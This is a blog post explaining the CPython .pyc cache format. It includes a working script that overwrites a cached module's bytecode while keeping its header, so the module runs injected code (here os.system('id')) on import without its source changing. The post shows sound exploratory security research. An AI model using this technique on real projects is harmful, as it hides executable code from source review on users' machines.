Abusing .pyc files
Published on 11.05.2025
I've come across the `__pycache__` folder a bunch of times. Never really messed around with it, but I knew that it's basically caching imported python bytecode. 

In cpython, the source code goes through the usual interpreter stages before execution such as - Lexing, Parsing...

The parsed AST isn't directly fed into the Python's VM, instead it's first compiled into Python Bytecode. Finally this bytecode is executed one by one by the VM.

To save a bunch of time from Lexing, Parsing and Compiling - Python caches the bytecodes as .pyc files. 

# main.py
import test
test.hello()

# test.py
def hello():
    print("hello world!")

So when you have the following `main.py` that imports `test.py`, Python creates a cache of the imported `test.py` inside a newly created directory called `__pycache__`.

sh$ tree
.
├── __pycache__
│   └── test.cpython-311.pyc
├── main.py
└── test.py

1 directory, 3 files

And when you run the `main.py`, it will use the compiled code from `test.cpython-311.pyc`, and doesn't recompile test.py unless the following.

I wondered the criteria for recaching an imported module... and apparently it's the following.

- File timestamp change
- File size change
- File hash change
- Magic number mismatch (often caused by a change in python version)
- Different compilation flags 
- Different optimisation flags 

Any of the above changes, the Python interpreter will recompile and overwrite the previous cache. Now humor me, assuming the above restrictions aren't true. 

What if we overwrite the cache with a different cache with our sneaky code inside of it? Would it run our sneaky code or the original code from the module `test.py`?

Let's try it. But first here's the breakdown of the format .pyc file format.

For < Python 3.7
+---------------------+
|   magic (4 bytes)   |
|---------------------|
| timestamp (4 bytes) |
|---------------------|
|                     |
|                     |
|      bytecode       |
|      (n bytes)      |
|                     |
|                     |
+---------------------+

For >= Python 3.7
+---------------------+
|   magic (4 bytes)   |
|---------------------|
|   flags (4 bytes)   |
|---------------------|
| timestamp (4 bytes) |
|   size (4 bytes)    |
|--------(OR)---------|
|    hash (8 bytes)   |
|---------------------|
|                     |
|                     |
|      bytecode       |
|      (n bytes)      |
|                     |
|                     |
+---------------------+

I'm working with Python 3.11.0 at the moment. 

So let's try to hijack that first example. I'll overwrite the `test.cpython-311.pyc` with my new one and I didn't have to change much. 

- I set the magic to whatever it was originally.

- Then I set the flags to 0. This is treated as a 32 bit unsigned integer. But only 4 bits hold meaning. "Hash based" is the first bit, "Checked Hash" is the 2nd, "Unchecked Hash" is 3rd and finally "Sized based" as last. Since I'm setting everything to 0, it's gonna be considered no flags. This prevents the hash checks (I didn't check with others).

- And timestamp and size are also the same as the original, so that it'll look like nothing has changed.

- Finally the bytecode will be different, it'll have our sneaky code instead of the original.

The bytecode is just marshal serialised data, so we compile our new code and serialise it.

>>> bytecode = compile('def hello(): __import__("os").system("id")',
...     'test.py', 
...     'exec'
... )
>>> marshal.dumps(bytecode)
b'\xe3\x00\x00\x00\x00...\xd0\x00)r\x08\x00\x00\x00'

Here's the code that puts all these ideas together.

# hijack.py
import marshal
import time
import sys
import dis
import struct

fn = sys.argv[1]

f = open(fn, 'rb')

magic = f.read(4)
print('magic=' + ' '.join([hex(i) for i in bytearray(magic)]))

flags = f.read(4)
fv = int.from_bytes(flags, byteorder='little') & 0xf
print(f'hash_based={bool(fv & 0x1)}, checked_hash={bool(fv & 0x2)}, unchecked_hash={bool(fv & 0x4)}, size_based={bool(fv & 0x8)}')

timestamp = f.read(8)
t, s = struct.unpack('<LL', timestamp)
print('timestamp='+time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(t)))

code = marshal.load(f)
c2 = compile('def hello(): __import__("os").system("id")', "test.py", "exec")
code2 = marshal.dumps(c2)

f.close()

with open(fn, 'wb') as outfile:
  outfile.write(magic + flags + timestamp + code2)

print(f"overwritten {fn}")

Before hijacking (original)

sh$ python3 main.py
hello world!

After hijacking (modified)

sh$ python3 hijack.py ./__pycache__/test.cpython-311.pyc
magic=0xa7 0xd 0xd 0xa
hash_based=False, checked_hash=False, unchecked_hash=False, size_based=False
timestamp=2025-05-11 23:01:18
overwritten ./__pycache__/test.cpython-311.pyc

sh$ python3 main.py
uid=501(pwnfunction) gid=20(staff) groups=20(staff),12(everyone)...

Our code `__import__('os').system('id')` got fired :) 

Reach out to me on twitter if you wanna talk more about this - @pwnfunction, 
See ya tomorrow, Byte Byte!